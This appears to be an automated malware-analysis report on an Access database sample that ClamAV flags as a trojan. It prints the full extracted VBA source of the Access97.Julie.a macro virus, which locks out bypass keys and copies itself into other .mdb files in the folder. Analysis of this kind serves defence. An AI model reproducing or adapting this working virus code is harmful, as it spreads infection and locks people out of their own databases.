MALICIOUS
80
Risk Score
Heuristics 2
-
ClamAV: Win.Trojan.A97M-5 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.A97M-5
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1168 bytes |
SHA-256: a5fca28269d8b14d0488073cbaf88f88818f72497f2416d2422dead7c12e822d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Modul1"
Option Compare Database
Option Explicit
Dim Julie As String
Function Julie()
On Error Resume Next
'Access97.Julie.a
'by -KD- / [Metaphase VX Team] & [NoMercyVirusTeam]
CurrentDb.Properties("AllowBypassKey") = False
CurrentDb.Properties("AllowSpecialKeys") = False
CurrentDb.Properties("AllowBreakIntoCode") = False
Application.DisplayStatusBar = False
Julie = Dir("*.mdb", vbNormal)
Do While Julie <> ""
If CurDir & "\" & Julie <> CurrentDb.Name Then
DoCmd.TransferDatabase acExport, "Microsoft Access", Julie, acMacro, "AutoExec", "AutoExec"
DoCmd.TransferDatabase acExport, "Microsoft Access", Julie, acModule, "Julie", "Julie"
End If
On Error GoTo Exit_Payload
If Day(Now()) = Int(Rnd() * 28) + 1 Then
MsgBox "Access97.Julie.a", "Someday We Will All Have Perfect Wings"
End If
Exit_Payload:
Julie = Dir()
Loop
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.